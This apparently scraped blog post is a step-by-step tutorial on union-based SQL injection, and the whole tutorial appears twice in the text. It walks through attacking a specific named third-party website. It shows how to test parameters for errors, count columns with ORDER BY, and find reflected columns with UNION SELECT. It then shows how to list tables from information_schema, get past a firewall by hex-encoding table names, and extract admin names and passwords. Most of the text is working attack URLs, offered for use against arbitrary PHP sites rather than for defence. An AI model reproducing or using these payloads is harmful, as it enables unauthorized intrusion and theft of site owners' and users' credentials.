Union Base Simple SQL injection
Less 1. Union Base Simple SQL injection
Step 1. Find The Injection Point On Any Php Site
(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid= etc)
Like This Site :- www.site.com/index.php?id=1
Step2. After Find It First Check This Site Vulnerable Or Not……
i Have A site http://bbss.com.pk/index.php?id=483
we will add single quoto(‘) after:- ?id=483
Like This http://bbss.com.pk/index.php?id=483’
Hit Enter
Step3. After adding the Single Quoto(‘) If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Vulnerable.
Step4. Start The Operation On Url, Now We Will Count total Number Of Columns In Information_schema.
We Will Use Order By Query For The Count The Columns.
Like This:- http://bbss.com.pk/index.php?id=483 order by 100--
i am putting -- for comment out the query
It is Showing error so.
now total number of columns is between 1 to 100 .
now i will decrease my columns no.
Step4.2 Now I Select Just 20th number of columns for shorting the site data.
Like this:- http://bbss.com.pk/index.php?id=483 order by 20--
still error
Here Is Total no. Of Columns Is 11 Because at 12 there is Error
Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,3,4,5,6,7,8,9,10,11--
Here Union Is Combining Both Of The Queries 1st one is site’s Query and 2nd is my select query..
Here It Is Not Printing Vulnerable Columns Because There Is Not Sufficient Free Space To Print
Vulnerable Columns…. so i will hide site data by using -- sign.
Now Here Vulnerable Columns is 3 and 6.
Now We Will Fetch All The Data Using Column Number 3 And 6.
Here Is Some Cmd For Fetch Data On Website:-
Variable/Function Output
@@hostname : Current Hostname
@@tmpdir : Tept Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current Sustem user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it have ssl or not
Step6. Now Finding The DataBase Name Or Version Name Using Vulnerable Columns.
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,Database(),4,5,Version(),7,8,9,10,11--
You See On Website Page:- Database Is= ‘bbss_com_pk_db’ , Version= ‘5.1.73-community’
Step7. Now We Will Fetch tablenames
Like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables--
information_schema is the collection of database…..here we are fetching all tablesnames from all database…
Here there is Onley one table But I want all the tables of information_schema…so i use group_concat() For the grouping of tables…
Step8. But i Want tablenames only from database….so now we will set where condition…
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–
Now These are all table of the database…
Step9. Now I Am unable to see all the tables so i will use <br> tag for the parallel printing of tablenames.
LikeThis:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,<br>),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–
Hit Enter We Shown A Error, We Need To Encrypt The <br> Tag In 0xHEX Code <br>=(0x3c62723e)
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Step10. Now I Fetch Table name ‘Admin_login’
Like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=admin_login--
oops Here Is Firwall That Block the table_name=admin_login fetching.
now i will Encrypt The admin_login in mysql_char().
LikeThis= http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e5f6c6f67696e--
We Got It The admin_login Columns.
Step11. Now i fetch Juicy Data That Is name and password
like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11 from admin_login--
In This Step i Use 0x3a for Divide The name and password (:) And Remember Dont Forget It Decrypt The admin_login on normal txt in Final Step.
Less No.2:- sqli Union based With waf bypass (Coming Soon…)
(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid= etc)
Like This Site :- www.site.com/index.php?id=1
Step2. After Find It First Check This Site Vulnerable Or Not……
i Have A site http://bbss.com.pk/index.php?id=483
we will add single quoto(‘) after:- ?id=483
Like This http://bbss.com.pk/index.php?id=483’
Hit Enter
Step3. After adding the Single Quoto(‘) If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Vulnerable.
Step4. Start The Operation On Url, Now We Will Count total Number Of Columns In Information_schema.
We Will Use Order By Query For The Count The Columns.
Like This:- http://bbss.com.pk/index.php?id=483 order by 100--
i am putting -- for comment out the query
It is Showing error so.
now total number of columns is between 1 to 100 .
now i will decrease my columns no.
Step4.2 Now I Select Just 20th number of columns for shorting the site data.
Like this:- http://bbss.com.pk/index.php?id=483 order by 20--
still error
Here Is Total no. Of Columns Is 11 Because at 12 there is Error
Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,3,4,5,6,7,8,9,10,11--
Here Union Is Combining Both Of The Queries 1st one is site’s Query and 2nd is my select query..
Here It Is Not Printing Vulnerable Columns Because There Is Not Sufficient Free Space To Print
Vulnerable Columns…. so i will hide site data by using -- sign.
Now Here Vulnerable Columns is 3 and 6.
Now We Will Fetch All The Data Using Column Number 3 And 6.
Here Is Some Cmd For Fetch Data On Website:-
Variable/Function Output
@@hostname : Current Hostname
@@tmpdir : Tept Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current Sustem user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it have ssl or not
Step6. Now Finding The DataBase Name Or Version Name Using Vulnerable Columns.
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,Database(),4,5,Version(),7,8,9,10,11--
You See On Website Page:- Database Is= ‘bbss_com_pk_db’ , Version= ‘5.1.73-community’
Step7. Now We Will Fetch tablenames
Like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables--
information_schema is the collection of database…..here we are fetching all tablesnames from all database…
Here there is Onley one table But I want all the tables of information_schema…so i use group_concat() For the grouping of tables…
Step8. But i Want tablenames only from database….so now we will set where condition…
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–
Now These are all table of the database…
Step9. Now I Am unable to see all the tables so i will use <br> tag for the parallel printing of tablenames.
LikeThis:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,<br>),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–
Hit Enter We Shown A Error, We Need To Encrypt The <br> Tag In 0xHEX Code <br>=(0x3c62723e)
Like This:- http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Step10. Now I Fetch Table name ‘Admin_login’
Like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=admin_login--
oops Here Is Firwall That Block the table_name=admin_login fetching.
now i will Encrypt The admin_login in mysql_char().
LikeThis= http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e5f6c6f67696e--
We Got It The admin_login Columns.
Step11. Now i fetch Juicy Data That Is name and password
like This:-http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11 from admin_login--
In This Step i Use 0x3a for Divide The name and password (:) And Remember Dont Forget It Decrypt The admin_login on normal txt in Final Step.
Less No.2:- sqli Union based With waf bypass (Coming Soon…)
Union Base Simple SQL injection
Reviewed by Unknown
on
12/09/2015
Rating: